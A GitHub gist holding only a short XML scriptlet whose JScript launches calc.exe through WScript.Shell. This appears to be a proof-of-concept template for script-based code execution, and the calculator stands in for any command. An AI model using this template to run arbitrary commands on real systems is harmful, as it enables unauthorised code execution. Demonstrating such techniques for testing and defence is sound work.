Skip to content

Instantly share code, notes, and snippets.

@Numbers11
Last active September 11, 2017 13:20
Show Gist options
  • Save Numbers11/aba453751e8772ebbd1db99fbccf8f1d to your computer and use it in GitHub Desktop.
Save Numbers11/aba453751e8772ebbd1db99fbccf8f1d to your computer and use it in GitHub Desktop.
<?XML version="1.0"?>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment